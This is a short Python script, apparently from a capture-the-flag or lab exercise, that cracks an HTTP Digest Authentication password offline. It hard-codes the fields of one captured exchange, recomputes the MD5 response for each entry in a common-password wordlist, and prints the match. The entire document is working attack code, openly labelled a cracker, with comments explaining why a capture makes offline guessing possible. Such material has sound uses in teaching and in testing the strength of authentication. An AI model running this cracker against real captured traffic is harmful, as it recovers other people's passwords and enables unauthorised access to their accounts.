# HTTP Digest Authentication cracker
import hashlib

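# Fields taken from one captured Digest exchange. Everything that feeds the
# response hash except the password is visible in the request, which is why a
# capture is enough to test password guesses offline.
username = "travis14"
realm = "Cheese"
nonce = "/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640"
uri = "/secret/cheese"
qop = "auth"
nc = "00000001"
cnonce = "ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc="
response = "872aafc461761e417d2df47b85e43d2b"

# Request method of the captured exchange; it is hashed into HA2.
method = "HEAD"


def _md5_hex(text):
    """Return the lowercase hex MD5 digest of *text* encoded as UTF-8."""
    return hashlib.md5(text.encode('utf-8')).hexdigest()


# HA2 = MD5(method:uri) does not depend on the candidate password, so it is
# computed once instead of on every wordlist line.
ha2 = _md5_hex(method + ":" + uri)

# Recompute the response for each wordlist entry and compare it with the
# captured value. errors="replace" keeps one undecodable byte in the wordlist
# from aborting the whole run; such an entry simply will not match.
with open("10k-most-common.txt", encoding="utf-8", errors="replace") as f:
    for line in f:
        candidate = line.strip()
        # HA1 = MD5(username:realm:password)
        ha1 = _md5_hex(username + ":" + realm + ":" + candidate)
        # qop=auth form: MD5(HA1:nonce:nc:cnonce:qop:HA2)
        computed = _md5_hex(
            ha1 + ":" + nonce + ":" + nc + ":" + cnonce + ":" + qop + ":" + ha2
        )
        # Compare against the captured value by name; the computed digest is
        # kept in its own variable so `response` is never overwritten.
        if computed == response:
            print("Password: " + candidate)
            break
    else:
        # Reached only when the loop ends without a break.
        print("No match in wordlist")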